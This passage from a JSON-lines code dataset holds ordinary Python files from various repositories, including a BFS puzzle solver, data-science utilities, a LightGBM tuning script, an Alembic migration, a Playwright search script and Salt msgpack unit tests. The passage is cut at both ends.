scipy_params=None,\n)\n\n# Count distribution\nregister_distn(\n name=\"count\",\n stats=OrderedDict(\n [\n (\"count\", \"sum\"),\n ]\n ),\n scipy_class=None,\n scipy_params=None,\n)\n\n# Normal\nregister_distn(\n name=\"normal\",\n stats=OrderedDict([(\"sum\", \"sum\"), (\"sos\", \"sos\"), (\"count\", \"count\")]),\n scipy_class=scipy.stats.distributions.norm,\n scipy_params={\n \"loc\": lambda sum, sos, count: sum,\n \"scale\": lambda sum, sos, count: np.sqrt(sos - sum**2 / (count - 1)),\n },\n)\n\n# Binomial\nregister_distn(\n name=\"binomial\",\n stats=OrderedDict([(\"sum\", \"sum\"), (\"count\", \"count\")]),\n scipy_class=scipy.stats.distributions.binom,\n scipy_params={\"n\": lambda sum, count: count, \"p\": lambda sum, count: sum / count},\n)\n","repo_name":"matthewwardrop/mensor","sub_path":"mensor/measures/registries.py","file_name":"registries.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"78"} +{"seq_id":"2661972253","text":"from collections import deque\n\npuzzleInput = 1364\ntarget = (31,39)\n# puzzleInput = 10\n# target = (7,4)\n\ndef isOpenSpace(x,y, favnum):\n bnum = 
list(bin((x*x + 3*x + 2*x*y + y + y*y) + favnum))\n l = len([i for i in bnum if i == '1'])\n return l % 2 == 0\n \nx, y = (1,1)\n\n\nvisited = set()\nvisited50 = set()\n\nq = deque()\nq.append((1,1,0))\nwhile q:\n x,y,s = q.popleft()\n if s <= 50: visited50.add((x,y))\n visited.add((x,y))\n for d in [(1,0), (-1,0), (0,1), (0,-1)]:\n x1 = x + d[0]; y1 = y + d[1]\n if x1 < 0 or y1 <0:\n continue\n if x1 == target[0] and y1 == target[1]: # goal\n print(\"Part 1:\", s+1)\n print(\"Part 2:\", len(visited50))\n exit(0)\n if not((x1,y1) in visited):\n if isOpenSpace(x1,y1, puzzleInput): # possible to go here\n q.append((x1,y1,s+1))\n","repo_name":"hanken68/aoc2016","sub_path":"day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36489330252","text":"import optparse\nimport os\nimport sys\nimport parse_deps\nimport StringIO\n\nsrcdir = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../src\"))\n\ndef flatten_module_contents(filenames):\n out = StringIO.StringIO()\n load_sequence = parse_deps.calc_load_sequence(filenames, srcdir)\n\n flattened_module_names = [\"'%s'\" % module.name for module in load_sequence]\n out.write(\" if (!window.FLATTENED) window.FLATTENED = {};\\n\")\n for module in load_sequence:\n out.write(\" window.FLATTENED['%s'] = true;\\n\" % module.name);\n\n for module in load_sequence:\n out.write(module.contents)\n if module.contents[-1] != '\\n':\n out.write('\\n')\n return out.getvalue()\n\ndef flatten_style_sheet_contents(filenames):\n out = StringIO.StringIO()\n load_sequence = parse_deps.calc_load_sequence(filenames, srcdir)\n\n # Stylesheets should be sourced from topmsot in, not inner-out.\n load_sequence.reverse()\n\n for module in load_sequence:\n for style_sheet in module.style_sheets:\n out.write(style_sheet.contents)\n if style_sheet.contents[-1] != '\\n':\n out.write('\\n')\n return out.getvalue()\n\ndef main(argv):\n parser = optparse.OptionParser(usage=\"flatten filename1.js [filename2.js ...]\",\n epilog=\"\"\"\nThis is a low-level flattening tool. 
You probably are meaning to run\ngenerate_standalone_timeline_view.py\n\"\"\")\n\n parser.add_option(\"--css\", dest=\"flatten_css\", action=\"store_true\", help=\"Outputs a flattened stylesheet.\")\n options, args = parser.parse_args(argv[1:])\n\n if len(args) == 0:\n sys.stderr.write(\"Expected: filename or filenames to flatten\\n\")\n return 255\n\n if options.flatten_css:\n sys.stdout.write(flatten_style_sheet_contents(args))\n else:\n sys.stdout.write(flatten_module_contents(args))\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","repo_name":"CyFI-Lab-Public/RetroScope","sub_path":"external/chromium-trace/trace-viewer/build/flatten.py","file_name":"flatten.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"78"} +{"seq_id":"37314154192","text":"import os\nimport glob\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom typing import Dict, Tuple\n\nfrom sklearn.preprocessing import OrdinalEncoder, MinMaxScaler, StandardScaler\nfrom sklearn.model_selection import train_test_split\n\nfrom autoembedder.autoembedder import AutoEmbedder\n\n\ndef create_output_dir(out_dir: str) -> str:\n \"\"\"Create a given output directory if it does not exist.\"\"\"\n target_dir = os.path.join(\".\", out_dir, \"\")\n os.makedirs(target_dir, exist_ok=True)\n return target_dir\n\n\ndef save_model(\n auto_embedder: AutoEmbedder, output_directory: str, model_name: str = \"autoembedder\"\n) -> None:\n create_output_dir(output_directory)\n output_file = os.path.join(output_directory, model_name)\n auto_embedder.save(output_file)\n\n\ndef load_model(model_dir: str) -> AutoEmbedder:\n try:\n return tf.keras.models.load_model(\n model_dir, custom_objects={\"AutoEmbedder\": AutoEmbedder}\n )\n except OSError:\n print(f\"Warning: No model found in {model_dir}\")\n return None\n\n\ndef get_sorted_input_files(\n input_dir: str, input_patterns: list[str], input_extension: str = \"feather\"\n) -> list[str]:\n if input_patterns is None or input_patterns == \"\" or input_patterns == []:\n return sorted(glob.glob(f\"{input_dir}/*.{input_extension}\"), reverse=True)\n else:\n input_files = []\n for pattern in input_patterns:\n these_input_files = sorted(\n glob.glob(f\"{input_dir}/*{pattern}*.{input_extension}\")\n )\n input_files.extend(these_input_files)\n return input_files\n\n\ndef get_dtype_dict(df: pd.DataFrame) -> Dict[str, list[str]]:\n \"\"\"Create a dictionary for numerical and categorical columns.\n\n For given dataframe, return a dict where the keys 'numerical' and 'categorical'\n contain lists of all the numerical / categorical column names, respectively.\n \"\"\"\n df_type_dict = {\"numerical\": [], \"categorical\": []}\n\n for col_name in df.columns:\n if pd.api.types.is_numeric_dtype(df[col_name]):\n df_type_dict[\"numerical\"].append(col_name)\n else:\n df_type_dict[\"categorical\"].append(col_name)\n return df_type_dict","repo_name":"ezeeEric/autoembedder","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72274998013","text":"\"\"\"added relationship in users table\n\nRevision ID: 57daa3993187\nRevises: a0b49d1f62e9\nCreate Date: 2023-09-14 09:05:07.003466\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '57daa3993187'\ndown_revision = 
'a0b49d1f62e9'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('nfl_players', schema=None) as batch_op:\n batch_op.drop_index('ix_nfl_players_last_name')\n batch_op.create_index(batch_op.f('ix_nfl_players_first_name'), ['first_name'], unique=False)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('nfl_players', schema=None) as batch_op:\n batch_op.drop_index(batch_op.f('ix_nfl_players_first_name'))\n batch_op.create_index('ix_nfl_players_last_name', ['last_name'], unique=False)\n\n # ### end Alembic commands ###\n","repo_name":"sandyjtech/fleague","sub_path":"server/migrations/versions/57daa3993187_added_relationship_in_users_table.py","file_name":"57daa3993187_added_relationship_in_users_table.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33138004379","text":"user_input = input('Say something to your teacher').lower()\nwhile user_input != \"i'm a doctor\":\n if user_input.__contains__('?'):\n print('HAHAHA! AHAHAHAHHA!! OMG! What a silly question! Go back to school!')\n elif user_input.__contains__('!'):\n print('YES! YESS! I WANT YOU TO BE MOTIVATED!! YES!')\n else:\n print('Go back to school!')\n user_input = input('Say something else to your teacher')\nelse:\n print('Well done! You can now talk to me')","repo_name":"stokesy56/Python-Basics","sub_path":"Exercises/exercise9.py","file_name":"exercise9.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31891076530","text":"from playwright.sync_api import Playwright, sync_playwright, expect\n\n\ndef run(playwright: Playwright) -> None:\n browser = playwright.firefox.launch(headless=False)\n context = browser.new_context()\n\n # Open new page\n page = context.new_page()\n\n # Go to https://www.baidu.com/\n page.goto(\"https://www.baidu.com/\")\n\n # Fill input[name=\"wd\"]\n page.locator(\"input[name=\\\"wd\\\"]\").fill(\"nba\")\n\n # Press Enter\n page.locator(\"input[name=\\\"wd\\\"]\").press(\"Enter\")\n page.wait_for_url(\"https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=nba&fenlei=256&rsv_pq=b321d273002fe08b&rsv_t=e75f5z3kxPeIUCaB%2FDN1AYWXKR4nxs%2Bap8NppAl0mSh5MAWeec9R%2FcyiGRQ&rqlang=cn&rsv_enter=1&rsv_dl=tb&rsv_sug3=3&rsv_sug1=3&rsv_sug7=100&rsv_sug2=0&rsv_btype=i&inputT=1276&rsv_sug4=1276\")\n\n # Close page\n page.close()\n\n # ---------------------\n context.close()\n browser.close()\n\n\nwith sync_playwright() as playwright:\n run(playwright)\n","repo_name":"CyclingPeach/Crawler-Project","sub_path":"Python3网络爬虫实战第二版笔记/第07章 JS动态渲染页面爬取/Playwright_script/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"23034030818","text":"from langchain.document_loaders import UnstructuredWordDocumentLoader\n\n\nclass DocFileLoader:\n def load_data(self, url):\n loader = UnstructuredWordDocumentLoader(url)\n output = []\n data = loader.load()\n content = data[0].page_content\n meta_data = data[0].metadata\n meta_data[\"url\"] = \"local\"\n output.append({\"content\": content, \"meta_data\": meta_data})\n return 
output\n","repo_name":"Panthole-s-Lab/embedchain","sub_path":"embedchain/loaders/doc_file.py","file_name":"doc_file.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"26823955677","text":"#!/usr/bin/env python3\n\nimport math\n\nfrom itertools import chain, cycle, accumulate # last of which is Python 3 only\n\ndef factors(n):\n def prime_powers(n):\n # c goes through 2, 3, 5, then the infinite (6n + 1, 6n + 5) series\n for c in accumulate(chain([2, 1, 2], cycle([2, 4]))):\n if c * c > n: break\n if n % c: continue\n d, p = (), c\n while not n % c:\n n,p,d = n // c, p * c, d + (p,)\n yield d\n if n > 1: yield (n,)\n\n r = [1]\n for e in prime_powers(n):\n r += [a * b for a in r for b in e]\n return r\n\ndef is_prime(n):\n if n % 2 == 0:\n return False\n\n sqrt_n = int(math.floor(math.sqrt(n)))\n for i in range(3, sqrt_n + 1, 2):\n if n % i == 0:\n return False\n return True\n\ndef main():\n return max(filter(is_prime, factors(600851475143)))\n\nif __name__ == '__main__':\n x = main()\n assert(x == 6857)\n print(x)","repo_name":"catb0t/projects-backup","sub_path":"py/euler/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16176037217","text":"import lightgbm as lgb\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\n\ndata = np.loadtxt(open(\"./mean_train_data.csv\", \"rb\"), delimiter = \",\", skiprows = 0).astype(int)\ntarget = np.loadtxt(open(\"./mean_train_label.csv\", \"rb\"), delimiter = \",\", skiprows = 0)\nX_train,X_test,y_train,y_test =train_test_split(data,target,random_state=0,test_size=0.2)\n\n\n#choose n_estimators\nparams = {\n 'boosting_type': 'gbdt',\n 'objective': 'regression',\n 'metric': 'rmse',\n 'nthread': 8,\n 'learning_rate': 0.1,\n 'num_leaves': 100,\n 'max_depth': 6,\n 'subsample': 0.8,\n 'colsample_bytree': 0.8,\n}\n\ndata_train = lgb.Dataset(X_train, y_train)\ncv_results = lgb.cv(params, data_train, num_boost_round=1000, nfold=5, stratified=False, shuffle=True, metrics='rmse',\n early_stopping_rounds=100, seed=0)\n# cv_results = lgb.cv(\n# params, data_train, num_boost_round=1000, nfold=5, stratified=False, shuffle=True, metrics='rmse',\n# early_stopping_rounds=50, verbose_eval=50, show_stdv=True, seed=0)\n\nprint('best n_estimators:', len(cv_results['rmse-mean']))\nprint('best cv score:', pd.Series(cv_results['rmse-mean']).max())\n# RMSE:best n_estimators: 289 ,best cv score: 212.7707418568886\n# MAE:best n_estimators: inf ,best cv score: 37.933071219886145\n\n\n\"\"\"\n# #chose max_depth and num_leaves\n# params_test1 = {'max_depth':[6], 'num_leaves': [100]}\n#\n# gsearch1 = GridSearchCV(\n# estimator=lgb.LGBMRegressor(objective='regression', metrics='rmse', learning_rate=0.1,\n# n_estimators=289, max_depth=6, subsample=0.8, colsample_bytree=0.8),\n# param_grid=params_test1, scoring='neg_mean_squared_error', cv=3, verbose=1, n_jobs=4, return_train_score=True)#n_jobs – Number of parallel threads.\n# gsearch1.fit(X_train, y_train)\n# gsearch1.grid_scores__, gsearch1.best_params_, gsearch1.best_score_\n\nparams_test1={\n 'max_depth': [7],\n 'num_leaves':[120]\n}\nmodel_lgb = lgb.LGBMRegressor(objective='regression',num_leaves=50,\n learning_rate=0.1, n_estimators=50, max_depth=7,\n metric='rmse', 
bagging_fraction = 0.8,feature_fraction = 0.8)\ngsearch1 = GridSearchCV(estimator=model_lgb, param_grid=params_test1, scoring='neg_mean_squared_error',\n cv=3, verbose=1, n_jobs=4, return_train_score=True)\ngsearch1.fit(X_train, y_train)\ngsearch1.grid_scores__, gsearch1.best_params_, gsearch1.best_score_\n\n#choose min_data_in_leaf\n# params_test2={'min_data_in_leaf':range(10,102,10)}\n# gsearch2 = GridSearchCV(estimator = lgb.LGBMRegressor(objective='regression',metrics='rmse',learning_rate=0.1, n_estimators=289, max_depth=4, num_leaves=10,subsample=0.8, colsample_bytree=0.8,nthread=7),\n# param_grid = params_test2, scoring='neg_mean_squared_error',cv=5,n_jobs=-1, return_train_score = True)\n# gsearch2.fit(X_train,y_train)\n# gsearch2.grid_scores__, gsearch2.best_params_, gsearch2.best_score_\n#\n# #choose colsample_bytree and subsample\n# params_test3={'colsample_bytree': [0.6,0.7,0.8,0.9,1.0],\n# 'subsample': [0.6,0.7,0.8,0.9,1.0]}\n# gsearch3 = GridSearchCV(estimator = lgb.LGBMRegressor(objective='regression',metrics='rmse',learning_rate=0.1, n_estimators=289, max_depth=4, num_leaves=10,subsample=0.8, colsample_bytree=0.8,nthread=7),\n# param_grid = params_test3, scoring='neg_mean_squared_error',cv=5,n_jobs=-1, return_train_score = True)\n# gsearch3.fit(X_train,y_train)\n# gsearch3.grid_scores__, gsearch3.best_params_, gsearch3.best_score_\n#\n# #choose lambda_l1 and lambda_l2\n# params_test4={'lambda_l1': [1e-5,1e-3,1e-1,0.0,0.1,0.3],\n# 'lambda_l2': [1e-5,1e-3,1e-1,0.0,0.1,0.3]}\n# gsearch4 = GridSearchCV(estimator = lgb.LGBMRegressor(objective='regression',metrics='rmse',learning_rate=0.1, n_estimators=289, max_depth=4, num_leaves=10,subsample=0.8, colsample_bytree=0.8,nthread=7),\n# param_grid = params_test4, scoring='neg_mean_squared_error',cv=5,n_jobs=-1, return_train_score = True)\n# gsearch4.fit(X_train,y_train)\n# gsearch4.grid_scores__, gsearch4.best_params_, gsearch4.best_score_\n\"\"\"","repo_name":"XiaoYanxin/tencent_ad","sub_path":"lgbm_tuning parameters.py","file_name":"lgbm_tuning parameters.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"13405439571","text":"# Merge sort recursively divides the list into two repeatedly and then merges the smaller lists back into a larger one in the correct order.\nimport sys\n\ndef merge_sort():\n with open(sys.argv[1]) as f:\n lines = [int(x.rstrip(\"\\n\")) for x in f.readlines()]\n\n result = msort(lines)\n print(result)\n return result\n\ndef msort(arr):\n if len(arr) < 2:\n return arr\n \n mid = len(arr) //2\n # want to do it to the right half and left half recursivley\n left_arr = msort(arr[:mid])\n right_arr = msort(arr[mid:])\n result = []\n i = 0\n j = 0\n\n while i < len(left_arr) and j < len(right_arr):\n if left_arr[i] < right_arr[j]:\n result.append(left_arr[i])\n i+=1\n else:\n result.append(right_arr[j])\n j+=1\n\n result += left_arr[i:]\n result += right_arr[j:]\n return result\n\n\nif __name__ == \"__main__\":\n merge_sort()","repo_name":"maxengelhard/computerscience","sub_path":"sort/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12856071564","text":"\"\"\"\nTest the MessagePack utility\n\"\"\"\nimport inspect\nimport os\nimport pprint\nimport struct\nimport sys\nfrom io import BytesIO\n\nimport pytest\n\nimport salt.utils.msgpack\nfrom salt.utils.odict import 
OrderedDict\nfrom tests.support.unit import TestCase\n\ntry:\n import msgpack\nexcept ImportError:\n import msgpack_pure as msgpack # pylint: disable=import-error\n\n\n# A keyword to pass to tests that use `raw`, which was added in msgpack 0.5.2\nraw = {\"raw\": False} if msgpack.version > (0, 5, 2) else {}\n\n\n@pytest.mark.skipif(\n not salt.utils.msgpack.HAS_MSGPACK, reason=\"msgpack module required for these tests\"\n)\nclass TestMsgpack(TestCase):\n \"\"\"\n In msgpack, the following aliases exist:\n load = unpack\n loads = unpackb\n dump = pack\n dumps = packb\n The salt.utils.msgpack versions of these functions are not aliases,\n verify that they pass the same relevant tests from:\n https://github.com/msgpack/msgpack-python/blob/master/test/\n \"\"\"\n\n test_data = [\n 0,\n 1,\n 127,\n 128,\n 255,\n 256,\n 65535,\n 65536,\n 4294967295,\n 4294967296,\n -1,\n -32,\n -33,\n -128,\n -129,\n -32768,\n -32769,\n -4294967296,\n -4294967297,\n 1.0,\n b\"\",\n b\"a\",\n b\"a\" * 31,\n b\"a\" * 32,\n None,\n True,\n False,\n (),\n ((),),\n (\n (),\n None,\n ),\n {None: 0},\n (1 << 23),\n ]\n\n def test_version(self):\n \"\"\"\n Verify that the version exists and returns a value in the expected format\n \"\"\"\n version = salt.utils.msgpack.version\n self.assertTrue(isinstance(version, tuple))\n self.assertGreater(version, (0, 0, 0))\n\n def test_Packer(self):\n data = os.urandom(1024)\n packer = salt.utils.msgpack.Packer()\n unpacker = msgpack.Unpacker(None)\n\n packed = packer.pack(data)\n # Sanity Check\n self.assertTrue(packed)\n self.assertNotEqual(data, packed)\n\n # Reverse the packing and the result should be equivalent to the original data\n unpacker.feed(packed)\n unpacked = msgpack.unpackb(packed)\n self.assertEqual(data, unpacked)\n\n def test_Unpacker(self):\n data = os.urandom(1024)\n packer = msgpack.Packer()\n unpacker = salt.utils.msgpack.Unpacker(None)\n\n packed = packer.pack(data)\n # Sanity Check\n self.assertTrue(packed)\n self.assertNotEqual(data, packed)\n\n # Reverse the packing and the result should be equivalent to the original data\n unpacker.feed(packed)\n unpacked = msgpack.unpackb(packed)\n self.assertEqual(data, unpacked)\n\n def test_array_size(self):\n sizes = [0, 5, 50, 1000]\n bio = BytesIO()\n packer = salt.utils.msgpack.Packer()\n for size in sizes:\n bio.write(packer.pack_array_header(size))\n for i in range(size):\n bio.write(packer.pack(i))\n\n bio.seek(0)\n unpacker = salt.utils.msgpack.Unpacker(bio, use_list=True)\n for size in sizes:\n self.assertEqual(unpacker.unpack(), list(range(size)))\n\n def test_manual_reset(self):\n sizes = [0, 5, 50, 1000]\n packer = salt.utils.msgpack.Packer(autoreset=False)\n for size in sizes:\n packer.pack_array_header(size)\n for i in range(size):\n packer.pack(i)\n\n bio = BytesIO(packer.bytes())\n unpacker = salt.utils.msgpack.Unpacker(bio, use_list=True)\n for size in sizes:\n self.assertEqual(unpacker.unpack(), list(range(size)))\n\n packer.reset()\n self.assertEqual(packer.bytes(), b\"\")\n\n def test_map_size(self):\n sizes = [0, 5, 50, 1000]\n bio = BytesIO()\n packer = salt.utils.msgpack.Packer()\n for size in sizes:\n bio.write(packer.pack_map_header(size))\n for i in range(size):\n bio.write(packer.pack(i)) # key\n bio.write(packer.pack(i * 2)) # value\n\n bio.seek(0)\n if salt.utils.msgpack.version > (0, 6, 0):\n unpacker = salt.utils.msgpack.Unpacker(bio, strict_map_key=False)\n else:\n unpacker = salt.utils.msgpack.Unpacker(bio)\n for size in sizes:\n self.assertEqual(unpacker.unpack(), {i: i * 2 for i in 
range(size)})\n\n def test_max_buffer_size(self):\n \"\"\"\n Test if max buffer size allows at least 100MiB\n \"\"\"\n bio = BytesIO()\n bio.write(salt.utils.msgpack.packb(\"0\" * (100 * 1024 * 1024)))\n bio.seek(0)\n unpacker = salt.utils.msgpack.Unpacker(bio)\n raised = False\n try:\n unpacker.unpack()\n except ValueError:\n raised = True\n self.assertFalse(raised)\n\n def test_exceptions(self):\n # Verify that this exception exists\n self.assertTrue(salt.utils.msgpack.exceptions.PackValueError)\n self.assertTrue(salt.utils.msgpack.exceptions.UnpackValueError)\n self.assertTrue(salt.utils.msgpack.exceptions.PackValueError)\n self.assertTrue(salt.utils.msgpack.exceptions.UnpackValueError)\n\n def test_function_aliases(self):\n \"\"\"\n Fail if core functionality from msgpack is missing in the utility\n \"\"\"\n\n def sanitized(item):\n if inspect.isfunction(getattr(msgpack, item)):\n # Only check objects that exist in the same file as msgpack\n return inspect.getfile(getattr(msgpack, item)) == inspect.getfile(\n msgpack\n )\n\n msgpack_items = {\n x for x in dir(msgpack) if not x.startswith(\"_\") and sanitized(x)\n }\n msgpack_util_items = set(dir(salt.utils.msgpack))\n self.assertFalse(\n msgpack_items - msgpack_util_items,\n \"msgpack functions with no alias in `salt.utils.msgpack`\",\n )\n\n def _test_base(self, pack_func, unpack_func):\n \"\"\"\n In msgpack, 'dumps' is an alias for 'packb' and 'loads' is an alias for 'unpackb'.\n Verify that both salt.utils.msgpack function variations pass the exact same test\n \"\"\"\n data = os.urandom(1024)\n\n packed = pack_func(data)\n # Sanity Check\n self.assertTrue(packed)\n self.assertIsInstance(packed, bytes)\n self.assertNotEqual(data, packed)\n\n # Reverse the packing and the result should be equivalent to the original data\n unpacked = unpack_func(packed)\n self.assertEqual(data, unpacked)\n\n def _test_buffered_base(self, pack_func, unpack_func):\n data = os.urandom(1024).decode(errors=\"ignore\")\n buffer = BytesIO()\n # Sanity check, we are not borking the BytesIO read function\n self.assertNotEqual(BytesIO.read, buffer.read)\n buffer.read = buffer.getvalue\n pack_func(data, buffer)\n # Sanity Check\n self.assertTrue(buffer.getvalue())\n self.assertIsInstance(buffer.getvalue(), bytes)\n self.assertNotEqual(data, buffer.getvalue())\n\n # Reverse the packing and the result should be equivalent to the original data\n unpacked = unpack_func(buffer)\n\n if isinstance(unpacked, bytes):\n unpacked = unpacked.decode()\n\n self.assertEqual(data, unpacked)\n\n def test_buffered_base_pack(self):\n self._test_buffered_base(\n pack_func=salt.utils.msgpack.pack, unpack_func=msgpack.unpack\n )\n\n def test_buffered_base_unpack(self):\n self._test_buffered_base(\n pack_func=msgpack.pack, unpack_func=salt.utils.msgpack.unpack\n )\n\n def _test_unpack_array_header_from_file(self, pack_func, **kwargs):\n f = BytesIO(pack_func([1, 2, 3, 4]))\n unpacker = salt.utils.msgpack.Unpacker(f)\n self.assertEqual(unpacker.read_array_header(), 4)\n self.assertEqual(unpacker.unpack(), 1)\n self.assertEqual(unpacker.unpack(), 2)\n self.assertEqual(unpacker.unpack(), 3)\n self.assertEqual(unpacker.unpack(), 4)\n self.assertRaises(salt.utils.msgpack.exceptions.OutOfData, unpacker.unpack)\n\n @pytest.mark.skipif(\n not hasattr(sys, \"getrefcount\"), \"sys.getrefcount() is needed to pass this test\"\n )\n def _test_unpacker_hook_refcnt(self, pack_func, **kwargs):\n result = []\n\n def hook(x):\n result.append(x)\n return x\n\n basecnt = sys.getrefcount(hook)\n\n up = 
salt.utils.msgpack.Unpacker(object_hook=hook, list_hook=hook)\n\n self.assertGreaterEqual(sys.getrefcount(hook), basecnt + 2)\n\n up.feed(pack_func([{}]))\n up.feed(pack_func([{}]))\n self.assertEqual(up.unpack(), [{}])\n self.assertEqual(up.unpack(), [{}])\n self.assertEqual(result, [{}, [{}], {}, [{}]])\n\n del up\n\n self.assertEqual(sys.getrefcount(hook), basecnt)\n\n def _test_unpacker_ext_hook(self, pack_func, **kwargs):\n class MyUnpacker(salt.utils.msgpack.Unpacker):\n def __init__(self):\n my_kwargs = {}\n super().__init__(ext_hook=self._hook, **raw)\n\n def _hook(self, code, data):\n if code == 1:\n return int(data)\n else:\n return salt.utils.msgpack.ExtType(code, data)\n\n unpacker = MyUnpacker()\n unpacker.feed(pack_func({\"a\": 1}))\n self.assertEqual(unpacker.unpack(), {\"a\": 1})\n unpacker.feed(pack_func({\"a\": salt.utils.msgpack.ExtType(1, b\"123\")}))\n self.assertEqual(unpacker.unpack(), {\"a\": 123})\n unpacker.feed(pack_func({\"a\": salt.utils.msgpack.ExtType(2, b\"321\")}))\n self.assertEqual(\n unpacker.unpack(), {\"a\": salt.utils.msgpack.ExtType(2, b\"321\")}\n )\n\n def _check(\n self, data, pack_func, unpack_func, use_list=False, strict_map_key=False\n ):\n my_kwargs = {}\n if salt.utils.msgpack.version >= (0, 6, 0):\n my_kwargs[\"strict_map_key\"] = strict_map_key\n ret = unpack_func(pack_func(data), use_list=use_list, **my_kwargs)\n self.assertEqual(ret, data)\n\n def _test_pack_unicode(self, pack_func, unpack_func):\n test_data = [\"\", \"abcd\", [\"defgh\"], \"Русский текст\"]\n for td in test_data:\n ret = unpack_func(pack_func(td), use_list=True, **raw)\n self.assertEqual(ret, td)\n packer = salt.utils.msgpack.Packer()\n data = packer.pack(td)\n ret = salt.utils.msgpack.Unpacker(\n BytesIO(data), use_list=True, **raw\n ).unpack()\n self.assertEqual(ret, td)\n\n def _test_pack_bytes(self, pack_func, unpack_func):\n test_data = [\n b\"\",\n b\"abcd\",\n (b\"defgh\",),\n ]\n for td in test_data:\n self._check(td, pack_func, unpack_func)\n\n def _test_pack_byte_arrays(self, pack_func, unpack_func):\n test_data = [\n bytearray(b\"\"),\n bytearray(b\"abcd\"),\n (bytearray(b\"defgh\"),),\n ]\n for td in test_data:\n self._check(td, pack_func, unpack_func)\n\n def _test_ignore_unicode_errors(self, pack_func, unpack_func):\n ret = unpack_func(\n pack_func(b\"abc\\xeddef\", use_bin_type=False), unicode_errors=\"ignore\", **raw\n )\n self.assertEqual(\"abcdef\", ret)\n\n def _test_strict_unicode_unpack(self, pack_func, unpack_func):\n packed = pack_func(b\"abc\\xeddef\", use_bin_type=False)\n self.assertRaises(UnicodeDecodeError, unpack_func, packed, use_list=True, **raw)\n\n def _test_ignore_errors_pack(self, pack_func, unpack_func):\n ret = unpack_func(\n pack_func(\"abc\\uDC80\\uDCFFdef\", use_bin_type=True, unicode_errors=\"ignore\"),\n use_list=True,\n **raw\n )\n self.assertEqual(\"abcdef\", ret)\n\n def _test_decode_binary(self, pack_func, unpack_func):\n ret = unpack_func(pack_func(b\"abc\"), use_list=True)\n self.assertEqual(b\"abc\", ret)\n\n @pytest.mark.skipif(\n salt.utils.msgpack.version < (0, 2, 2),\n \"use_single_float was added in msgpack==0.2.2\",\n )\n def _test_pack_float(self, pack_func, **kwargs):\n self.assertEqual(\n b\"\\xca\" + struct.pack(\">f\", 1.0), pack_func(1.0, use_single_float=True)\n )\n self.assertEqual(\n b\"\\xcb\" + struct.pack(\">d\", 1.0),\n pack_func(1.0, use_single_float=False),\n )\n\n def _test_odict(self, pack_func, unpack_func):\n seq = [(b\"one\", 1), (b\"two\", 2), (b\"three\", 3), (b\"four\", 4)]\n\n od = 
OrderedDict(seq)\n self.assertEqual(dict(seq), unpack_func(pack_func(od), use_list=True))\n\n def pair_hook(seq):\n return list(seq)\n\n self.assertEqual(\n seq, unpack_func(pack_func(od), object_pairs_hook=pair_hook, use_list=True)\n )\n\n def _test_pair_list(self, unpack_func, **kwargs):\n pairlist = [(b\"a\", 1), (2, b\"b\"), (b\"foo\", b\"bar\")]\n packer = salt.utils.msgpack.Packer()\n packed = packer.pack_map_pairs(pairlist)\n if salt.utils.msgpack.version > (0, 6, 0):\n unpacked = unpack_func(packed, object_pairs_hook=list, strict_map_key=False)\n else:\n unpacked = unpack_func(packed, object_pairs_hook=list)\n self.assertEqual(pairlist, unpacked)\n\n @pytest.mark.skipif(\n salt.utils.msgpack.version < (0, 6, 0),\n \"getbuffer() was added to Packer in msgpack 0.6.0\",\n )\n def _test_get_buffer(self, pack_func, **kwargs):\n packer = msgpack.Packer(autoreset=False, use_bin_type=True)\n packer.pack([1, 2])\n strm = BytesIO()\n strm.write(packer.getbuffer())\n written = strm.getvalue()\n\n expected = pack_func([1, 2], use_bin_type=True)\n self.assertEqual(expected, written)\n\n @staticmethod\n def no_fail_run(test, *args, **kwargs):\n \"\"\"\n Run a test without failure and return any exception it raises\n \"\"\"\n try:\n test(*args, **kwargs)\n except Exception as e: # pylint: disable=broad-except\n return e\n\n def test_binary_function_compatibility(self):\n functions = [\n {\"pack_func\": salt.utils.msgpack.packb, \"unpack_func\": msgpack.unpackb},\n {\"pack_func\": msgpack.packb, \"unpack_func\": salt.utils.msgpack.unpackb},\n ]\n # These functions are equivalent but could potentially be overwritten\n if salt.utils.msgpack.dumps is not salt.utils.msgpack.packb:\n 